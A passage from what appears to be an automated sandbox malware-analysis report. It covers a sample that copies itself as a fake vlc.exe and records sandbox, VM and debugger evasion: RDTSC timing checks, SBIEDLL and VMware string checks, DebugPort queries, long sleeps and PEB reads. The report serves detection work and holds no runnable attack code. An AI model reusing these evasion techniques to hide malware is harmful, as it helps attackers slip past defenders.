          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.361962402.0000000003291000.00000004.00000001.sdmp, vlc.exe, 00000002.00000002.394994348.0000000002E81000.00000004.00000001.sdmp, vlc.exe, 00000006.00000002.420685537.0000000002831000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002FB98E4 second address: 0000000002FB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002FB9B5E second address: 0000000002FB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000005998E4 second address: 00000000005998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000599B5E second address: 0000000000599B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe TID: 7148Thread sleep count: 64 > 30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe TID: 7164Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 5116Thread sleep count: 64 > 30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4680Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 6488Thread sleep count: 64 > 30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 5696Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6656Thread sleep time: -46000s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: explorer.exe, 00000007.00000000.424413724.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000007.00000000.424671958.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.417728913.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.416435027.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: vlc.exe, 00000006.00000002.421153729.0000000002949000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.424413724.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000007.00000000.417728913.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.423843937.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000007.00000000.416435027.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.416435027.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.423843937.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000007.00000000.424671958.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000007.00000000.397228054.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000007.00000000.416435027.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F3138 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1951 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BE962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8966 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01400100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01400100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01400100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F395E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F395E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140C1C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014099C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014099C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014099C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014099C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B19D8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F519E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C89E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BA189 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BA189 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F31E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014061A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014061A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014061A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014061A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014CF1B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014CF1B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142C9BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142C9BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1843 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01410050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141F86D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424020 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F7057 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A830 mov eax, dword ptr fs:[00000030h]
